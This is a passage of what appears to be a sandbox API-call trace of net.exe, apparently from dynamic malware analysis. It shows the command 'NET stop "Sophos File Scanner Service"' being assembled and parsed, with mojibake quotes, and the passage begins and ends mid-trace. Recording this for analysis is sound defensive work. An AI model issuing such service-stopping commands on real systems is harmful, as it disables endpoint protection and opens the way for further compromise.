[0210.373] _wcsicmp (_String1="WKSTA", _String2="File") returned 17 [0210.373] _wcsicmp (_String1="WKSTA", _String2="Scanner") returned 4 [0210.373] _wcsicmp (_String1="WKSTA", _String2="ServiceΓÇ¥") returned 4 [0210.373] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0210.373] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.373] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0210.373] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Sophos") returned -835 [0210.373] _wcsicmp (_String1="PRDR", _String2="File") returned 10 [0210.373] _wcsicmp (_String1="PRDR", _String2="Scanner") returned -3 [0210.373] _wcsicmp (_String1="PRDR", _String2="ServiceΓÇ¥") returned -3 [0210.373] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0210.373] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.373] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0210.373] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Sophos") returned -847 [0210.373] _wcsicmp (_String1="DEVRDR", _String2="File") returned -2 [0210.373] _wcsicmp (_String1="DEVRDR", _String2="Scanner") returned -15 [0210.373] _wcsicmp (_String1="DEVRDR", _String2="ServiceΓÇ¥") returned -15 [0210.373] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.373] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0210.373] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.373] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0210.373] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.374] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0210.374] _wcsicmp (_String1="SVR", _String2="ΓÇ£Sophos") returned -832 [0210.374] _wcsicmp (_String1="SVR", _String2="File") returned 13 [0210.374] _wcsicmp (_String1="SVR", _String2="Scanner") returned 19 [0210.374] _wcsicmp (_String1="SVR", _String2="ServiceΓÇ¥") returned 17 [0210.374] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0210.374] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.374] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0210.374] _wcsicmp (_String1="SRV", _String2="ΓÇ£Sophos") returned -832 [0210.374] _wcsicmp (_String1="SRV", _String2="File") returned 13 [0210.374] _wcsicmp (_String1="SRV", _String2="Scanner") returned 15 [0210.374] _wcsicmp (_String1="SRV", _String2="ServiceΓÇ¥") returned 13 [0210.374] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.374] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x20f62c, nSize=0x0, Arguments=0x20f628 | out: lpBuffer="㼸&ꔺ瓡") returned 0x1c [0210.374] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0210.374] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0210.374] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0210.374] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0210.374] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.374] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0210.374] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0210.374] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.374] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0210.374] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.374] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0210.374] wcscpy_s (in: _Destination=0xbea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0210.374] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a00000 [0210.375] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a00000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0xbeb338, nSize=0x800, Arguments=0xbe9dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0210.376] GetFileType (hFile=0x26c) returned 0x3 [0210.376] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x264208 [0210.376] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x264208, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0210.376] WriteFile (in: hFile=0x26c, lpBuffer=0x264208, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20f60c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f60c, lpOverlapped=0x0) returned 0 [0210.376] LocalFree (hMem=0x264208) returned 0x0 [0210.376] GetFileType (hFile=0x26c) returned 0x3 [0210.376] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x263d98 [0210.376] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x263d98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n&", lpUsedDefaultChar=0x0) returned 2 [0210.376] WriteFile (in: hFile=0x26c, lpBuffer=0x263d98, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f60c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f60c, lpOverlapped=0x0) returned 0 [0210.376] LocalFree (hMem=0x263d98) returned 0x0 [0210.376] wcscpy_s (in: _Destination=0x20f6c4, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0210.376] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0210.376] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0210.376] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0210.376] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos") returned 0x0 [0210.376] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos ") returned 0x0 [0210.376] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos ", _SizeInWords=0x200, _Source="File", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos File") returned 0x0 [0210.376] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos File", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos File ") returned 0x0 [0210.376] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos File ", _SizeInWords=0x200, _Source="Scanner", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos File Scanner") returned 0x0 [0210.376] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos File Scanner", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos File Scanner ") returned 0x0 [0210.376] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos File Scanner ", _SizeInWords=0x200, _Source="ServiceΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥") returned 0x0 [0210.376] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&댸¾ Ѱ¾ɬ") returned 0xad [0210.377] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes | NO}", _MaxCount=0x2a) returned 18 [0210.377] LocalFree (hMem=0x265870) returned 0x0 [0210.377] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x2e [0210.377] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD | /DEL}", _MaxCount=0x2a) returned 16 [0210.377] LocalFree (hMem=0x263f80) returned 0x0 [0210.377] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0x7d [0210.377] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:time]\r", _MaxCount=0x2a) returned 16 [0210.377] LocalFree (hMem=0x265870) returned 0x0 [0210.377] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x26 [0210.377] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r\n", _MaxCount=0x2a) returned 16 [0210.377] LocalFree (hMem=0x263f80) returned 0x0 [0210.377] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x19 [0210.377] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x2a) returned 16 [0210.377] LocalFree (hMem=0x263f80) returned 0x0 [0210.377] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x1b [0210.377] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x2a) returned 13 [0210.377] LocalFree (hMem=0x263f80) returned 0x0 [0210.377] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0xbe [0210.377] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text\"]] [", _MaxCount=0x2a) returned 12 [0210.377] LocalFree (hMem=0x265870) returned 0x0 [0210.377] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x33 [0210.377] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET command ", _MaxCount=0x2a) returned 11 [0210.377] LocalFree (hMem=0x263f80) returned 0x0 [0210.377] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x19 [0210.377] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x2a) returned 11 [0210.377] LocalFree (hMem=0x263f80) returned 0x0 [0210.377] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0xc1 [0210.377] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:\"text", _MaxCount=0x2a) returned 7 [0210.377] LocalFree (hMem=0x265870) returned 0x0 [0210.377] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x16 [0210.377] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x2a) returned 3 [0210.377] LocalFree (hMem=0x263f80) returned 0x0 [0210.377] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x33 [0210.377] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DELETE] [/", _MaxCount=0x2a) returned 15 [0210.377] LocalFree (hMem=0x263f80) returned 0x0 [0210.377] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0x234 [0210.378] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET SHARE\r\nsharename\r\n sharename=", _MaxCount=0x2a) returned 12 [0210.378] LocalFree (hMem=0x265870) returned 0x0 [0210.378] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x13 [0210.378] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x2a) returned 14 [0210.378] LocalFree (hMem=0x263f80) returned 0x0 [0210.378] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x14 [0210.378] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x2a) returned 14 [0210.378] LocalFree (hMem=0x263f80) returned 0x0 [0210.378] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x14 [0210.378] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x2a) returned 14 [0210.378] LocalFree (hMem=0x263f80) returned 0x0 [0210.378] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.378] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x2a) returned 14 [0210.378] LocalFree (hMem=0x263f80) returned 0x0 [0210.378] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.378] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x2a) returned 14 [0210.378] LocalFree (hMem=0x263f80) returned 0x0 [0210.378] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x16 [0210.378] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x2a) returned 14 [0210.378] LocalFree (hMem=0x263f80) returned 0x0 [0210.378] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x11 [0210.378] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x2a) returned 14 [0210.378] LocalFree (hMem=0x263f80) returned 0x0 [0210.378] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x14 [0210.378] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x2a) returned 14 [0210.378] LocalFree (hMem=0x263f80) returned 0x0 [0210.378] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x12 [0210.378] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x2a) returned 14 [0210.378] LocalFree (hMem=0x263f80) returned 0x0 [0210.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0xf [0210.379] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x2a) returned 14 [0210.379] LocalFree (hMem=0x263f80) returned 0x0 [0210.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x17 [0210.379] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x2a) returned 14 [0210.379] LocalFree (hMem=0x263f80) returned 0x0 [0210.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x18 [0210.379] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x2a) returned 14 [0210.379] LocalFree (hMem=0x263f80) returned 0x0 [0210.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x2a [0210.379] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER]\r\n\r\n", _MaxCount=0x2a) returned 14 [0210.379] LocalFree (hMem=0x263f80) returned 0x0 [0210.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.379] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x2a) returned 19 [0210.379] LocalFree (hMem=0x263f80) returned 0x0 [0210.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0x58 [0210.379] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN[:dom", _MaxCount=0x2a) returned -1 [0210.379] LocalFree (hMem=0x265870) returned 0x0 [0210.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0x184 [0210.379] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\computername\\", _MaxCount=0x2a) returned -2 [0210.379] LocalFree (hMem=0x265870) returned 0x0 [0210.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0xc7 [0210.379] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET USER\r\n[username [password | *] [option", _MaxCount=0x2a) returned -2 [0210.379] LocalFree (hMem=0x265870) returned 0x0 [0210.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0x47 [0210.379] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | [/ALL", _MaxCount=0x2a) returned -3 [0210.379] LocalFree (hMem=0x265870) returned 0x0 [0210.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0xc2 [0210.379] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONFIG | ", _MaxCount=0x2a) returned 19 [0210.379] LocalFree (hMem=0x265870) returned 0x0 [0210.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0x319 [0210.379] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="SERVICES\r\nNET START can be used to start s", _MaxCount=0x2a) returned -5 [0210.379] LocalFree (hMem=0x265870) returned 0x0 [0210.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0x483 [0210.379] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="SYNTAX\r\nThe following conventions are used", _MaxCount=0x2a) returned -5 [0210.379] LocalFree (hMem=0x265870) returned 0x0 [0210.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0xa86 [0210.380] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="NAMES\r\nThe following types of names are us", _MaxCount=0x2a) returned 4 [0210.380] LocalFree (hMem=0x265870) returned 0x0 [0210.380] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0x54 [0210.380] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner ServiceΓÇ¥", _String2="\r\nFor more information on tools see the co", _MaxCount=0x2a) returned 97 [0210.380] LocalFree (hMem=0x265870) returned 0x0 [0210.380] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 塰& ") returned 0xad [0210.380] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{mi", _MaxCount=0x1f) returned 18 [0210.380] LocalFree (hMem=0x265870) returned 0x0 [0210.380] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x2e [0210.380] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET COMPUTER\r\n\\\\computername {/", _MaxCount=0x1f) returned 16 [0210.380] LocalFree (hMem=0x263f80) returned 0x0 [0210.380] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="塰&⡋瓢 㾀& ") returned 0x7d [0210.380] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET CONFIG SERVER\r\n[/AUTODISCON", _MaxCount=0x1f) returned 16 [0210.380] LocalFree (hMem=0x265870) returned 0x0 [0210.380] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 塰& ") returned 0x26 [0210.380] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET CONFIG\r\n[SERVER | WORKSTATI", _MaxCount=0x1f) returned 16 [0210.380] LocalFree (hMem=0x263f80) returned 0x0 [0210.380] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x19 [0210.380] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1f) returned 16 [0210.380] LocalFree (hMem=0x263f80) returned 0x0 [0210.380] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x1b [0210.380] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File Scanner", _String2="NET FILE\r\n[id 